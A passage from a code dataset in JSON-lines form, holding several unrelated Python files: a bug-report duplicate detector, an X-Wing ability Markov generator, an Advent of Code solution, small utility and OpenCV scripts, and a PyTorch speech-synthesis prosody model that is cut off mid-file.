delete_all_tokenized_reports()\n \"\"\"\n return TokenizedReport.delete_all() # May raise NoReportsFound\n\ndef get_number_of_reports() -> int:\n \"\"\"\n Get the number of reports in the database.\n Returns:\n int: number of reports.\n Example:\n >>> num_reports = get_number_of_reports()\n \"\"\"\n return TokenizedReport.get_number_of_reports()\n\n###############################################################################\n\n# CLI Create Report\n\ndef get_highest_id() -> int:\n \"\"\"\n Get the highest report id in the database.\n Returns:\n int: highest report id.\n Example:\n >>> highest_id = get_highest_id()\n \"\"\"\n return TokenizedReport.get_highest_id()\n\ndef cli_get_possible_duplicates(component: str, summary: str, description: str, default_model: bool=True) -> tuple:\n \"\"\"\n Gets the similar report to the one is wanted to be stored.\n Uses SIDRD to get the possible duplicates\n Args:\n component: component of the report.\n summary: summary of the report.\n description: description of the report.\n default_model: if True, use the default model. If False, use the last trained model\n Returns:\n tuple: \n - report processed by SIDRD (TokenizedReport)\n - list of possible duplicates (dictionaries with report_id, component, summary, description, creation_time)\n Example:\n >>> report, similar_reports = cli_get_possible_duplicates('Core', 'Summary', 'Description')\n \"\"\"\n sidrd = SIDRD(default_model=default_model)\n highest_id = get_highest_id() # May raise NoReportsFound\n report = TokenizedReport(\n report_id=highest_id+1, creation_time=datetime.now(), status=\"NEW\", \n component=component, dupe_of=None, summary=summary, comments= description,\n text=\"\", tokens=[]\n )\n try:\n reports_to_compare = get_tokenized_reports(limit=0)\n except NoReportsFound:\n return report, []\n return sidrd.get_duplicates(report, reports_to_compare)\n\ndef cli_create_report(report: TokenizedReport, dupe_of: int) -> None:\n \"\"\"\n Create a report in the database.\n Args:\n report: report to be created (TokenizedReport)\n dupe_of: id of the report this is a duplicate of. 0 if not a duplicate.\n Exceptions:\n ReportAlreadyExists. If the report already exists.\n Example:\n >>> report = cli_create_report(report, dupe_of)\n \"\"\"\n if dupe_of == 0:\n dupe_of = None\n else:\n try:\n master = get_tokenized_report(report_id=dupe_of)\n dupe_of = master.report_id\n except ReportNotFound:\n pass # dupe_of = dupe_of\n\n report.dupe_of = dupe_of if dupe_of != 0 else None\n\n report = create_tokenized_report(\n report.report_id, report.creation_time, \n report.status, report.component, report.dupe_of, \n report.summary, report.comments, report.text, report.tokens) # May raise ReportAlreadyExists\n\n\ndef retrain_sidrd(config_path: str, verbose: bool = True) -> None:\n \"\"\"\n Retrain SIDRD with the new reports.\n Args:\n config_path: path to the config file.\n Example:\n >>> retrain_sidrd(config_path, True)\n \"\"\"\n sidrd = SIDRD()\n try:\n new_config = json.load(open(config_path))\n # TODO: The reports to retrain should be chosen after an analysis of the reports\n report_set = get_tokenized_reports(limit=0)\n sidrd.retrain(report_set, new_config, verbose)\n except FileNotFoundError:\n print(\"Config file not found\")\n\n","repo_name":"Alburrito/sidrd-project","sub_path":"backend/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":13363,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"42"} +{"seq_id":"17591022025","text":"import os\nimport json\nimport random\n\nabilities = []\nmarkov = {}\nreplacements = [\n\t[\",\",\"\"],\n\t[\".\",\"\"],\n\t[\"[Bullseye Arc]\",\"[Bullseye-Arc]\"],\n\t[\"[Critical Hit]\",\"[Critical-Hit]\"],\n\t[\"[Left Arc]\",\"[Left-Arc]\"],\n\t[\"[Right Arc]\",\"[Right-Arc]\"],\n\t[\"[Single Turret Arc]\",\"[Single-Turret-Arc]\"],\n\t[\"[Front Arc]\",\"[Front-Arc]\"],\n\t[\"[Rear Arc]\",\"[Rear-Arc]\"],\n\t[\"[Full Front Arc]\",\"[Full-Front-Arc]\"],\n\t[\"[Full Rear Arc]\",\"[Full-Rear-Arc]\"],\n\t[\"([Segnor's Loop Left] or [Segnor's Loop Right])\",\"\"],\n\t[\"([Turn Left] or [Turn Right])\",\"\"],\n\t[\"[[Tallon Roll Left] or [Tallon Roll Right]]\",\"\"],\n\t[\"[Bank Left]\",\"[Bank-Left]\"],\n\t[\"[Bank Left]\",\"[Bank-Right]\"],\n\t[\"[Turn Left]\",\"[Turn-Left]\"],\n\t[\"[Turn Right]\",\"[Turn-Right]\"],\n]\nfirst_word_totals = {}\nfirst_words = []\nfirstWordKey = \"FIIIIRSTWOOOROD\"\nlastWordKey = \"LAAAASTWOOOORD\"\n\ndef create_random_ability():\n\tline = []\n\tword = random.choice(first_words)\n\twhile word != lastWordKey:\n\t\tline.append(word)\n\t\tif word in markov:\n\t\t\tword_choices = []\n\t\t\tword_weights = []\n\t\t\tfor next_word in markov[word]:\n\t\t\t\tif(next_word != firstWordKey):\n\t\t\t\t\tword_choices.append(next_word)\n\t\t\t\t\tword_weights.append(markov[word][next_word])\n\t\t\tword = random.choices(word_choices, word_weights)[0]\n\t\telse:\n\t\t\tword = lastWordKey\n\tprint(\" \".join(line))\n\ndef convert_markov_to_probabilities():\n\tfor word in markov:\n\t\ttotal = 0\n\t\tfor next_word in markov[word]:\n\t\t\tif(next_word == firstWordKey):\n\t\t\t\tfirst_word_totals[word] = markov[word][next_word]\n\t\t\t\tfirst_words.append(word)\n\t\t\telse:\n\t\t\t\ttotal += markov[word][next_word]\n\t\tfor next_word in markov[word]:\n\t\t\tif(next_word != firstWordKey):\n\t\t\t\tmarkov[word][next_word] = markov[word][next_word] / total\n\ndef process_abilities():\n\tfor line in abilities:\n\t\tfor replacement in replacements:\n\t\t\tline = line.replace(replacement[0], replacement[1])\n\t\tsplitLine = line.split(\" \")\n\t\tindex = 0\n\t\twhile index < len(splitLine):\n\t\t\tprocess_ability_line(index, splitLine)\n\t\t\tindex += 1\n\ndef process_ability_line(index, wordArray):\n\tword = wordArray[index]\n\tfirstWord = index == 0\n\tlastWord = index == len(wordArray) - 1\n\tif lastWord:\n\t\tif word not in markov:\n\t\t\tmarkov[word]={lastWordKey:1}\n\t\telse:\n\t\t\tif lastWordKey in markov[word]:\n\t\t\t\tmarkov[word][lastWordKey] += 1\n\t\t\telse:\n\t\t\t\tmarkov[word][lastWordKey] = 1\n\t\treturn\n\tnextWord = wordArray[index + 1]\n\tif word not in markov:\n\t\tmarkov[word] = {nextWord:1}\n\t\tif firstWord:\n\t\t\tmarkov[word][firstWordKey] = 1\n\telse:\n\t\tif nextWord in markov[word]:\n\t\t\tmarkov[word][nextWord] += 1\n\t\telse:\n\t\t\tmarkov[word][nextWord] = 1\n\t\tif firstWord:\n\t\t\tif firstWordKey in markov[word]:\n\t\t\t\tmarkov[word][firstWordKey] += 1\n\t\t\telse:\n\t\t\t\tmarkov[word][firstWordKey] = 1\n\ndef process_file(file):\n\topenfile = open(file)\n\tloadedjson = json.load(openfile)\n\tif \"pilots\" not in loadedjson:\n\t\treturn\n\tfor pilot in loadedjson[\"pilots\"]:\n\t\tif \"ability\" in pilot:\n\t\t\tabilities.append(pilot[\"ability\"])\n\ndef process_directory(directory):\n\tfor r, d, f in os.walk(directory):\n\t\tfor subdirectory in d:\n\t\t\tprocess_directory(subdirectory)\n\t\tfor file in f:\n\t\t\tif file.endswith(\".json\"):\n\t\t\t\tprocess_file(os.path.join(r, file))\n\ndef main():\n\tthisdir = os.getcwd()\n\tprocess_directory(thisdir)\n\tprocess_abilities()\n\twith open('abilities.txt', mode='wt', encoding='utf-8') as myfile:\n\t\tmyfile.write('\\n'.join(abilities))\n\twith open('markov.json', 'w') as fp:\n\t\tjson.dump(markov, fp)\n\tconvert_markov_to_probabilities()\n\tval = 100\n\twhile val > 0:\n\t\tcreate_random_ability()\n\t\tval -= 1\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"achapin/xwing-pilot-ability-markov","sub_path":"xwing-markov.py","file_name":"xwing-markov.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"32728114700","text":"with open('input.txt') as f:\r\n s = f.read().split(',')\r\n\r\narr = [int(i) for i in s]\r\ndp = [0]*9\r\n\r\nfor i in arr:\r\n dp[i] += 1\r\n \r\nfor _ in range(256):\r\n \r\n new_dp = dp[:]\r\n for i in range(9):\r\n if i == 8:\r\n new_dp[8] = dp[0]\r\n elif i == 6:\r\n new_dp[6] = dp[7] + dp[0]\r\n else:\r\n new_dp[i] = dp[i+1]\r\n \r\n dp = new_dp[:]\r\n\r\nprint(sum(dp))","repo_name":"manialm/advent-of-code","sub_path":"2021/6/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"42"} +{"seq_id":"31886704187","text":"import string\nimport random\n\ndef gen():\n dic = \"\"\n ll = [\"a-z\", \"A-Z\", \"0-9\", \"@-#\"]\n \n for i in range(5):\n choice = random.choice(ll)\n if (choice == \"a-z\"):\n dic += string.ascii_lowercase\n elif (choice == \"A-Z\"):\n dic += string.ascii_uppercase\n elif (choice == \"0-9\"):\n dic += string.digits\n elif (choice == \"@-#\"):\n dic += string.punctuation\n \n return dic\n\ndef main():\n print(gen())\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"xandeft/GAK","sub_path":"gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"27078598221","text":"#!/usr/bin/python\n# coding=utf-8\nfrom utils.readExcel import *\nimport json\nfrom utils.logger import Log\nfp = excel_path('test_datas.xlsx')\nlogger = Log(logger='get_params').get_log()\n\n\ndef get_params(sheet, case):\n \"\"\"\n 获取请求参数\n :param sheet: sheet name\n :param case: 用例名\n :return:\n \"\"\"\n index = 0\n # 获取当前用例所在行下标\n col_case = col_value(fp, sheet, 1)\n for i in range(len(col_case)):\n if col_case[i] == case:\n index = i\n break\n params = cell_value(fp, sheet, index+1, 3)\n # print(params)\n # print(type(params))\n # if type(params) == str or type(params) == bytes or type(params) == bytearray:\n try:\n params = json.loads(params)\n finally:\n return params\n\n\ndef get_resp_params(sheet, case, resp_key):\n \"\"\"\n 获取响应参数\n :param resp_key: 响应名\n :param sheet: sheet name\n :param case: 用例名\n :return:\n \"\"\"\n index = 0\n param_key = row_value_by_casename(fp, sheet, 'case_name')\n param_value = row_value_by_casename(fp, sheet, case)\n for i in range(len(param_key)):\n if param_key[i] == resp_key:\n index = i\n break\n return param_value[index]\n\n\ndef get_url(sheet, case):\n \"\"\"\n 获取响应参数\n :param url_key: 字段名\n :param sheet: sheet name\n :param case: 用例名\n :return:\n \"\"\"\n index = 0\n param_key = row_value_by_casename(fp, sheet, 'case_name')\n param_value = row_value_by_casename(fp, sheet, case)\n # 获取 url 列的下标\n for i in range(len(param_key)):\n if param_key[i] == 'url':\n index = i\n break\n return param_value[index]\n\n\nif __name__ == '__main__':\n\n # req = get_req_params('cms_login', 'login_Sucess')\n # resp_c = get_resp_params('cms_login', 'login_Sucess', 'code')\n # resp_m = get_resp_params('cms_login', 'login_Sucess', 'msg')\n # print(req)\n # print(resp_c, resp_m)\n # url = get_url('cms_login', 'login_Sucess')\n # print(url)\n a = get_params('members', 'vipBeyRecords')\n print(a)\n print(type(a))\n","repo_name":"wang806/hopsapi_test","sub_path":"utils/getParams.py","file_name":"getParams.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"27069306962","text":"import cv2\nimport numpy as np\n\n\ndef click(event, x, y, flag, params):\n if event == cv2.EVENT_LBUTTONDOWN:\n print('a')\n\n\ncv2.namedWindow('control')\nsrc = cv2.imread('../Images/downtown.png')\nsrc2 = cv2.imread('../Images/face2.png')\nsrc3 = cv2.imread('../Images/skull.png')\nsrc4 = cv2.imread('../Images/apple.png')\nsrc5 = cv2.imread('../Images/hat.png')\n\nsrc = cv2.resize(src, (400, 400))\nsrc2 = cv2.resize(src2, (100, 100))\nsrc3 = cv2.resize(src3, (100, 100))\nsrc4 = cv2.resize(src4, (100, 100))\nsrc5 = cv2.resize(src5, (100, 100))\n\nhs = np.hstack((src2, src3, src4, src5))\nvs = np.vstack((src, hs))\n\ncv2.imshow('control', vs)\ncv2.setMouseCallback('control', click)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"le2dy/OpenCV","sub_path":"testroom/test7.py","file_name":"test7.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"25092700224","text":"import os\nimport json\nimport copy\nimport math\nfrom collections import OrderedDict\n\nimport torch\nimport torch.nn as nn\nfrom numba import jit, prange\nimport numpy as np\nimport torch.nn.functional as F\n\nfrom utils.tools import (\n get_variance_level,\n get_phoneme_level_pitch,\n get_phoneme_level_energy,\n get_mask_from_lengths,\n pad_1D,\n pad,\n dur_to_mel2ph,\n)\nfrom utils.pitch_tools import f0_to_coarse, denorm_f0, cwt2f0_norm\nfrom .transformers.blocks import (\n Embedding,\n SinusoidalPositionalEmbedding,\n LayerNorm,\n LinearNorm,\n ConvNorm,\n ConvBlock,\n ConvBlock2D,\n)\nfrom .transformers.transformer import ScaledDotProductAttention\nfrom .coordconv import CoordConv2d\n\n\n@jit(nopython=True)\ndef mas_width1(attn_map):\n \"\"\"mas with hardcoded width=1\"\"\"\n # assumes mel x text\n opt = np.zeros_like(attn_map)\n attn_map = np.log(attn_map)\n attn_map[0, 1:] = -np.inf\n log_p = np.zeros_like(attn_map)\n log_p[0, :] = attn_map[0, :]\n prev_ind = np.zeros_like(attn_map, dtype=np.int64)\n for i in range(1, attn_map.shape[0]):\n for j in range(attn_map.shape[1]): # for each text dim\n prev_log = log_p[i - 1, j]\n prev_j = j\n\n if j - 1 >= 0 and log_p[i - 1, j - 1] >= log_p[i - 1, j]:\n prev_log = log_p[i - 1, j - 1]\n prev_j = j - 1\n\n log_p[i, j] = attn_map[i, j] + prev_log\n prev_ind[i, j] = prev_j\n\n # now backtrack\n curr_text_idx = attn_map.shape[1] - 1\n for i in range(attn_map.shape[0] - 1, -1, -1):\n opt[i, curr_text_idx] = 1\n curr_text_idx = prev_ind[i, curr_text_idx]\n opt[0, curr_text_idx] = 1\n return opt\n\n\n@jit(nopython=True, parallel=True)\ndef b_mas(b_attn_map, in_lens, out_lens, width=1):\n assert width == 1\n attn_out = np.zeros_like(b_attn_map)\n\n for b in prange(b_attn_map.shape[0]):\n out = mas_width1(b_attn_map[b, 0, : out_lens[b], : in_lens[b]])\n attn_out[b, 0, : out_lens[b], : in_lens[b]] = out\n return attn_out\n\n\nclass PostNet(nn.Module):\n \"\"\"\n PostNet: Five 1-d convolution with 512 channels and kernel size 5\n \"\"\"\n\n def __init__(\n self,\n n_mel_channels=80,\n postnet_embedding_dim=512,\n postnet_kernel_size=5,\n postnet_n_convolutions=5,\n ):\n\n super(PostNet, self).__init__()\n self.convolutions = nn.ModuleList()\n\n self.convolutions.append(\n nn.Sequential(\n ConvNorm(\n n_mel_channels,\n postnet_embedding_dim,\n kernel_size=postnet_kernel_size,\n stride=1,\n padding=int((postnet_kernel_size - 1) / 2),\n dilation=1,\n w_init_gain=\"tanh\",\n ),\n nn.BatchNorm1d(postnet_embedding_dim),\n )\n )\n\n for i in range(1, postnet_n_convolutions - 1):\n self.convolutions.append(\n nn.Sequential(\n ConvNorm(\n postnet_embedding_dim,\n postnet_embedding_dim,\n kernel_size=postnet_kernel_size,\n stride=1,\n padding=int((postnet_kernel_size - 1) / 2),\n dilation=1,\n w_init_gain=\"tanh\",\n ),\n nn.BatchNorm1d(postnet_embedding_dim),\n )\n )\n\n self.convolutions.append(\n nn.Sequential(\n ConvNorm(\n postnet_embedding_dim,\n n_mel_channels,\n kernel_size=postnet_kernel_size,\n stride=1,\n padding=int((postnet_kernel_size - 1) / 2),\n dilation=1,\n w_init_gain=\"linear\",\n ),\n nn.BatchNorm1d(n_mel_channels),\n )\n )\n\n def forward(self, x):\n x = x.contiguous().transpose(1, 2)\n\n for i in range(len(self.convolutions) - 1):\n x = F.dropout(torch.tanh(self.convolutions[i](x)), 0.5, self.training)\n x = F.dropout(self.convolutions[-1](x), 0.5, self.training)\n\n x = x.contiguous().transpose(1, 2)\n return x\n\n\nclass ProsodyExtractor(nn.Module):\n \"\"\" Prosody Extractor \"\"\"\n\n def __init__(self, n_mel_channels, d_model, kernel_size):\n super(ProsodyExtractor, self).__init__()\n self.d_model = d_model\n self.conv_stack = nn.Sequential(\n ConvBlock2D(\n in_channels=1,\n out_channels=self.d_model,\n kernel_size=kernel_size,\n ),\n ConvBlock2D(\n in_channels=self.d_model,\n out_channels=1,\n kernel_size=kernel_size,\n ),\n )\n self.gru = nn.GRU(\n input_size=n_mel_channels,\n hidden_size=self.d_model,\n batch_first=True,\n bidirectional=True,\n )\n\n def get_prosody_embedding(self, mel):\n \"\"\"\n mel -- [B, mel_len, n_mel_channels], B=1\n h_n -- [B, 2 * d_model], B=1\n \"\"\"\n x = self.conv_stack(mel.unsqueeze(-1)).squeeze(-1)\n _, h_n = self.gru(x)\n h_n = torch.cat((h_n[0], h_n[1]), dim=-1)\n return h_n\n\n def forward(self, mel, mel_len, duration, src_len):\n \"\"\"\n mel -- [B, mel_len, n_mel_channels]\n mel_len -- [B,]\n duration -- [B, src_len]\n src_len -- [B,]\n batch -- [B, src_len, 2 * d_model]\n \"\"\"\n batch = []\n for m, m_l, d, s_l in zip(mel, mel_len, duration, src_len):\n b = []\n for m_p in torch.split(m[:m_l], list(d[:s_l].int()), dim=0):\n b.append(self.get_prosody_embedding(m_p.unsqueeze(0)).squeeze(0))\n batch.append(torch.stack(b, dim=0))\n\n return pad(batch)\n\n\nclass MDN(nn.Module):\n \"\"\" Mixture Density Network \"\"\"\n\n def __init__(self, in_features, out_features, num_gaussians):\n super(MDN, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.num_gaussians = num_gaussians\n self.w = nn.Sequential(\n nn.Linear(in_features, num_gaussians),\n nn.Softmax(dim=-1)\n )\n self.sigma = nn.Linear(in_features, out_features * num_gaussians)\n self.mu = nn.Linear(in_features, out_features * num_gaussians)\n\n def forward(self, x):\n \"\"\"\n x -- [B, src_len, in_features]\n w -- [B, src_len, num_gaussians]\n sigma -- [B, src_len, num_gaussians, out_features]\n mu -- [B, src_len, num_gaussians, out_features]\n \"\"\"\n B, src_len, _ = x.shape\n w = self.w(x)\n sigma = torch.exp(self.sigma(x))\n sigma = sigma.view(B, src_len, self.num_gaussians, self.out_features)\n mu = self.mu(x)\n mu = mu.view(B, src_len, self.num_gaussians, self.out_features)\n return w, sigma, mu\n\n\nclass ProsodyPredictor(nn.Module):\n \"\"\" Prosody Predictor \"\"\"\n\n def __init__(self, d_model, kernel_size, num_gaussians, dropout):\n super(ProsodyPredictor, self).__init__()\n self.d_model = d_model\n self.conv_stack = nn.ModuleList(\n [\n ConvBlock(\n in_channels=self.d_model,\n out_channels=self.d_model,\n kernel_size=kernel_size[i],\n dropout=dropout,\n normalization=nn.LayerNorm,\n transpose=True,\n )\n for i in range(2)\n ]\n )\n self.gru_cell = nn.GRUCell(\n self.d_model + 2 * self.d_model,\n 2 * self.d_model,\n )\n self.gmm_mdn = MDN(\n in_features=2 * self.d_model,\n out_features=2 * self.d_model,\n num_gaussians=num_gaussians,\n )\n\n def init_state(self, x):\n \"\"\"\n x -- [B, src_len, d_model]\n p_0 -- [B, 2 * d_model]\n self.gru_hidden -- [B, 2 * d_model]\n \"\"\"\n B, _, d_model = x.shape\n p_0 = torch.zeros((B, 2 * d_model), device=x.device, requires_grad=True)\n self.gru_hidden = torch.zeros((B, 2 * d_model), device=x.device, requires_grad=True)\n return p_0\n\n def forward(self, h_text, mask=None):\n \"\"\"\n h_text -- [B, src_len, d_model]\n mask -- [B, src_len]\n outputs -- [B, src_len, 2 * d_model]\n \"\"\"\n x = h_text\n for conv_layer in self.conv_stack:\n x = conv_layer(x, mask=mask)\n\n # Autoregressive Prediction\n p_0 = self.init_state(x)\n\n outputs = [p_0]\n for i in range(x.shape[1]):\n p_input = torch.cat((x[:, i], outputs[-1]), dim=-1) # [B, 3 * d_model]\n self.gru_hidden = self.gru_cell(p_input, self.gru_hidden) # [B, 2 * d_model]\n outputs.append(self.gru_hidden)\n outputs = torch.stack(outputs[1:], dim=1) # [B, src_len, 2 * d_model]\n\n # GMM-MDN\n w, sigma, mu = self.gmm_mdn(outputs)\n if mask is not None:\n w = w.masked_fill(mask.unsqueeze(-1), 0 if self.training else 1e-9) # 1e-9 for categorical sampling\n sigma = sigma.masked_fill(mask.unsqueeze(-1).unsqueeze(-1), 0)\n mu = mu.masked_fill(mask.unsqueeze(-1).unsqueeze(-1), 0)\n\n return w, sigma, mu\n\n @staticmethod\n def sample(w, sigma, mu, mask=None):\n \"\"\" Draw samples from a GMM-MDN \n w -- [B, src_len, num_gaussians]\n sigma -- [B, src_len, num_gaussians, out_features]\n mu -- [B, src_len, num_gaussians, out_features]\n mask -- [B, src_len]\n output -- [B, src_len, out_features]\n \"\"\"\n from torch.distributions import Categorical\n batch = []\n for i in range(w.shape[1]):\n w_i, sigma_i, mu_i = w[:, i], sigma[:, i], mu[:, i]\n ws = Categorical(w_i).sample().view(w_i.size(0), 1, 1)\n # Choose a random sample, one randn for batch X output dims\n # Do a (output dims)X(batch size) tensor here, so the broadcast works in\n # the next step, but we have to transpose back.\n gaussian_noise = torch.randn(\n (sigma_i.size(2), sigma_i.size(0)), requires_grad=False).to(w.device)\n variance_samples = sigma_i.gather(1, ws).detach().squeeze()\n mean_samples = mu_i.detach().gather(1, ws).squeeze()\n batch.append((gaussian_noise * variance_samples + mean_samples).transpose(0, 1))\n output = torch.stack(batch, dim=1)\n if mask is not None:\n output = output.masked_fill(mask.unsqueeze(-1), 0)\n return output\n\n\nclass ReferenceEncoder(nn.Module):\n \"\"\" Reference Mel Encoder \"\"\"\n\n def __init__(self, preprocess_config, model_config):\n super(ReferenceEncoder, self).__init__()\n\n E = model_config[\"transformer\"][\"encoder_hidden\"]\n n_mel_channels = preprocess_config[\"preprocessing\"][\"mel\"][\"n_mel_channels\"]\n ref_enc_filters = model_config[\"prosody_modeling\"][\"liu2021\"][\"ref_enc_filters\"]\n ref_enc_size = model_config[\"prosody_modeling\"][\"liu2021\"][\"ref_enc_size\"]\n ref_enc_strides = model_config[\"prosody_modeling\"][\"liu2021\"][\"ref_enc_strides\"]\n ref_enc_pad = model_config[\"prosody_modeling\"][\"liu2021\"][\"ref_enc_pad\"]\n ref_enc_gru_size = model_config[\"prosody_modeling\"][\"liu2021\"][\"ref_enc_gru_size\"]\n\n self.n_mel_channels = n_mel_channels\n K = len(ref_enc_filters)\n filters = [1] + ref_enc_filters\n # Use CoordConv at the first layer to better preserve positional information: https://arxiv.org/pdf/1811.02122.pdf\n convs = [CoordConv2d(in_channels=filters[0],\n out_channels=filters[0 + 1],\n kernel_size=ref_enc_size,\n stride=ref_enc_strides,\n padding=ref_enc_pad, with_r=True)]\n convs2 = [nn.Conv2d(in_channels=filters[i],\n out_channels=filters[i + 1],\n kernel_size=ref_enc_size,\n stride=ref_enc_strides,\n padding=ref_enc_pad) for i in range(1,K)]\n convs.extend(convs2)\n self.convs = nn.ModuleList(convs)\n self.bns = nn.ModuleList(\n [nn.BatchNorm2d(num_features=ref_enc_filters[i]) for i in range(K)])\n\n out_channels = self.calculate_channels(n_mel_channels, 3, 2, 1, K)\n self.gru = nn.GRU(input_size=ref_enc_filters[-1] * out_channels,\n hidden_size=ref_enc_gru_size,\n batch_first=True)\n\n def forward(self, inputs, mask=None):\n \"\"\"\n inputs --- [N, Ty/r, n_mels*r]\n outputs --- [N, E//2]\n \"\"\"\n N = inputs.size(0)\n out = inputs.view(N, 1, -1, self.n_mel_channels) # [N, 1, Ty, n_mels]\n for conv, bn in zip(self.convs, self.bns):\n out = conv(out)\n out = bn(out)\n out = F.relu(out) # [N, 128, Ty//2^K, n_mels//2^K]\n\n out = out.transpose(1, 2) # [N, Ty//2^K, 128, n_mels//2^K]\n T = out.size(1)\n N = out.size(0)\n out = out.contiguous().view(N, T, -1) # [N, Ty//2^K, 128*n_mels//2^K]\n if mask is not None:\n out = out.masked_fill(mask.unsqueeze(-1), 0)\n\n self.gru.flatten_parameters()\n memory, out = self.gru(out) # memory --- [N, Ty, E//2], out --- [1, N, E//2]\n\n return memory, out.squeeze(0)\n\n def calculate_channels(self, L, kernel_size, stride, pad, n_convs):\n for i in range(n_convs):\n L = (L - kernel_size + 2 * pad) // stride + 1\n return L\n\n\nclass PhonemeLevelProsodyEncoder(nn.Module):\n \"\"\" Phoneme-level Prosody Encoder \"\"\"\n\n def __init__(self, preprocess_config, model_config):\n super(PhonemeLevelProsodyEncoder, self).__init__()\n\n self.E = model_config[\"transformer\"][\"encoder_hidden\"]\n self.d_q = self.d_k = model_config[\"transformer\"][\"encoder_hidden\"]\n bottleneck_size = model_config[\"prosody_modeling\"][\"liu2021\"][\"bottleneck_size_p\"]\n ref_enc_gru_size = model_config[\"prosody_modeling\"][\"liu2021\"][\"ref_enc_gru_size\"]\n ref_attention_dropout = model_config[\"prosody_modeling\"][\"liu2021\"][\"ref_attention_dropout\"]\n\n self.encoder = ReferenceEncoder(preprocess_config, model_config)\n self.linears = nn.ModuleList([\n LinearNorm(in_dim, self.E, bias=False)\n for in_dim in (self.d_q, self.d_k)\n ])\n self.encoder_prj = nn.Linear(ref_enc_gru_size, self.E * 2)\n self.dropout = nn.Dropout(ref_attention_dropout)\n self.encoder_bottleneck = nn.Linear(self.E, bottleneck_size)\n\n def forward(self, x, text_lengths, src_mask, mels, mels_lengths, mel_mask):\n '''\n x --- [N, seq_len, encoder_embedding_dim]\n mels --- [N, Ty/r, n_mels*r], r=1\n out --- [N, seq_len, bottleneck_size]\n attn --- [N, seq_len, ref_len], Ty/r = ref_len\n '''\n embedded_prosody, _ = self.encoder(mels, mel_mask)\n\n # Bottleneck\n embedded_prosody = self.encoder_prj(embedded_prosody)\n\n # Obtain k and v from prosody embedding\n k, v = torch.split(embedded_prosody, self.E, dim=-1) # [N, Ty, E] * 2\n\n # Get attention mask\n src_len, mel_len = x.shape[1], mels.shape[1]\n text_mask = src_mask.unsqueeze(-1).expand(-1, -1, mel_len) # [batch, seq_len, mel_len]\n mels_mask = mel_mask.unsqueeze(1).expand(-1, src_len, -1) # [batch, seq_len, mel_len]\n\n # Attention\n q, k = [linear(vector) for linear, vector in zip(self.linears, (x, k))]\n attn = torch.matmul(q, k.transpose(-2, -1)) / math.sqrt(self.d_k) # [N, seq_len, ref_len]\n attn = attn.masked_fill(mels_mask, -np.inf)\n attn = self.dropout(F.softmax(attn, dim=-1))\n attn = attn.masked_fill(text_mask, 0.)\n out = self.encoder_bottleneck(torch.bmm(attn, v)) # [N, seq_len, bottleneck_size]\n out = out.masked_fill(src_mask.unsqueeze(-1), 0.)\n\n return out, attn\n\n\nclass STL(nn.Module):\n \"\"\" Style Token Layer \"\"\"\n\n def __init__(self, preprocess_config, model_config):\n super(STL, self).__init__()\n\n num_heads = 1\n E = model_config[\"transformer\"][\"encoder_hidden\"]\n self.token_num = model_config[\"prosody_modeling\"][\"liu2021\"][\"token_num\"]\n self.embed = nn.Parameter(torch.FloatTensor(\n self.token_num, E // num_heads))\n d_q = E // 2\n d_k = E // num_heads\n self.attention = StyleEmbedAttention(\n query_dim=d_q, key_dim=d_k, num_units=E, num_heads=num_heads)\n\n torch.nn.init.normal_(self.embed, mean=0, std=0.5)\n\n def forward(self, inputs):\n N = inputs.size(0)\n query = inputs.unsqueeze(1) # [N, 1, E//2]\n\n keys_soft = torch.tanh(self.embed).unsqueeze(0).expand(\n N, -1, -1) # [N, token_num, E // num_heads]\n\n # Weighted sum\n emotion_embed_soft = self.attention(query, keys_soft)\n\n return emotion_embed_soft\n\n\nclass StyleEmbedAttention(nn.Module):\n \"\"\" StyleEmbedAttention \"\"\"\n\n def __init__(self, query_dim, key_dim, num_units, num_heads):\n super(StyleEmbedAttention, self).__init__()\n self.num_units = num_units\n self.num_heads = num_heads\n self.key_dim = key_dim\n\n self.W_query = nn.Linear(\n in_features=query_dim, out_features=num_units, bias=False)\n self.W_key = nn.Linear(in_features=key_dim,\n out_features=num_units, bias=False)\n self.W_value = nn.Linear(\n in_features=key_dim, out_features=num_units, bias=False)\n\n def forward(self, query, key_soft):\n \"\"\"\n input:\n query --- [N, T_q, query_dim]\n key_soft --- [N, T_k, key_dim]\n output:\n out --- [N, T_q, num_units]\n \"\"\"\n values = self.W_value(key_soft)\n split_size = self.num_units // self.num_heads\n values = torch.stack(torch.split(values, split_size, dim=2), dim=0)\n\n out_soft = scores_soft = None\n querys = self.W_query(query) # [N, T_q, num_units]\n keys = self.W_key(key_soft) # [N, T_k, num_units]\n\n # [h, N, T_q, num_units/h]\n querys = torch.stack(torch.split(querys, split_size, dim=2), dim=0)\n # [h, N, T_k, num_units/h]\n keys = torch.stack(torch.split(keys, split_size, dim=2), dim=0)\n # [h, N, T_k, num_units/h]\n\n # score = softmax(QK^T / (d_k ** 0.5))\n scores_soft = torch.matmul(\n querys, keys.transpose(2, 3)) # [h, N, T_q, T_k]\n scores_soft = scores_soft / (self.key_dim ** 0.5)\n scores_soft = F.softmax(scores_soft, dim=3)\n\n # out = score * V\n # [h, N, T_q, num_units/h]\n out_soft = torch.matmul(scores_soft, values)\n out_soft = torch.cat(torch.split(out_soft, 1, dim=0), dim=3).squeeze(\n 0) # [N, T_q, num_units]\n\n return out_soft #, scores_soft\n\n\nclass UtteranceLevelProsodyEncoder(nn.Module):\n \"\"\" Utterance-level Prosody Encoder \"\"\"\n\n def __init__(self, preprocess_config, model_config):\n super(UtteranceLevelProsodyEncoder, self).__init__()\n\n self.E = model_config[\"transformer\"][\"encoder_hidden\"]\n self.d_q = 